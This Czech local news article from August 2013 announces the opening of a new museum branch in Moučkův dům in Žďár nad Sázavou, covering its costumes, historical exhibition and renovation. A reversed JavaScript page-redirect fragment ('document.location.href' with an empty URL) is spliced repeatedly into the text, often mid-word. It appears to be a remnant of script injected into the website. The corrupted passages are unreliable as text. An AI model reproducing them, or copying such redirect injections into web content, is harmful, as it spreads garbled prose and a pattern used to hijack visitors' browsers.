Žďár nad Sázavou, aktuality, Moučkův dům, kostýmy
Rainbow page separator

V Moučkově domě si zájemci vyzkouší kostýmy

Čtvrtek, 8. srpna 2013

mouckuv-dum3Žďár nad Sázavou / Vyzkoušet si připravené kostýmy, mezi kterými bude například i oděv, jejž nosívali cisterciáčtí mniši, bude možné v nové pobočce žďárského muzea v takzvaném Moučkově domě. Do objektu, jehož rekonstrukce a vybavení vyšly na 7,5 milionu korun s podporou evropské dotace, návštěvníci poprvé zavítají 22. srpna.

Dalším lákadlem bude například možnost se vyfotit na pozadí žďárského náměstí z 20. let minulého s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí, jemuž dominovaly některé dnes již zbourané objekty.

V přízemí Moučkova domu bude umístěna trvalá expozice spojená s dějinami Žďáru, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně archeologických nálezů z doby nejstaršího osídlení města. Zajímavostí je rovněž interiér žďárského kupeckého krámu z doby první republiky, případně his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie výrobků, které měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to proslavily.

Novinkou se stane elektronická prezentace, při které si mohou návštěvníci pomocí dotykové obrazovky vyhledat další zajímavosti z his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie Žďáru i regionu, v pobočce muzea nebudou chybět ani dobové fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie.
Ve zrekonstruovaném objektu se kromě expozice nachází depozitáře, kancelář, sociální zařízení a přednáškový sál s vybavením pro vzdělávací činnost dětí a mládeže. Právě ten dosud v regionálním muzeu chyběl.